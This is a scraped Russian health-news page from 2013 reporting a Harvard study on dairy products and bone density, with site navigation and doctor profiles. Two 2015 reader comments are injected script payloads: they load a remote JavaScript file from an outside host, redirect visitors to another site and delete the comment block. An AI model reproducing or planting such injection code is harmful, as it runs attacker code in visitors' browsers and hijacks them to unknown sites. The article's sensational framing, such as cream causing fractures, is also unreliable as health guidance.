Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Оказывается, не все молоч...  >>  Оказывается, не все молочные продукты хороши для костей! А некоторые вообще портят кости!
 
Обратная связь
 

Оказывается, не все молочные продукты хороши для костей! А некоторые вообще портят кости!

Размер шрифта
26 апреля 2013 00:00
Юрий Малышев
Здоровье инфо
Екатерина Иванникова
Здоровье инфо
  • google_analytics: false
  • Нравится

В новом американском исследовании были получены данные, противоречащие обычным рекомендациям врачей! Гарвардское исследование показало, что потребление молока или йогурта, повышает минеральную плотность только в шейке бедра. Плотность костей позвоночника при этом остается прежней! А сливки так вообще снижают плотность кости, что влечет за собой переломы после самых минимальных контактов!

«Молочные продукты содержат много важных веществ для кости. Но в некоторых из них, например, в сливках или мороженом, больше жира и сахара, чем кальция и витаминов», – говорит руководитель проекта доктор Шивани Сахни.

В исследование было включено 3212 добровольцев, которые были разделены на несколько групп в зависимости от выбора молочных продуктов. И полученные данные показали явные преимущества потребления молока более низкой жирности или обезжиренного йогурта. Эти продукты способствуют накоплению в костях кальция и витамина D, защищая сосуды от лишних жиров.

Любимый многими сыр не оправдал надежды, так как в его состав часто добавляют соль и консерванты. А соль вымывает кальций из костей, делая их хрупкими!

Хрупкие кости (остеопороз) – это эпидемия для женщин старше 45-50 лет. Примерно половина из них страдает этой болезнью! В России признаки остеопороза есть более чем у 15 миллионов людей! 35 миллионов человек находятся в группе высокого риска переломов шейки бедра и позвоночника. Данное исследование показало, что правильное питание может помочь в борьбе за свое здоровье!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

01 мая 2013 в 06:25

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Микроэлементы, дефицит которых ведет к обжорству   Обычный чай переломает вам ноги!   Женщины, которые пьют больше 3-х стаканов молока в день, умрут раньше остальных!   Костно-болевой синдром в патогенезе остеохондроза и остеоартроза. Методы лечения  
25 апреля 2013Оказывается, не все молочные продукты хороши для костей! А некоторые вообще портят кости! 19 декабря 2012Газированные напитки увеличивают риск артрита
 
30 января 2013Хотите не чувствовать боли – спите дольше 24 января 2013Низкокалорийный продукт может быть сытным
 

Слайдшоу

1
«Вредные» продукты, которые помогут вам похудеть
9 сладких парочек, которые спасут вас!
Супереда для костей

Тесты

1
Есть ли у вас остеопороз?
Есть ли у вас гормональные нарушения
Какой матрас вам подходит?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.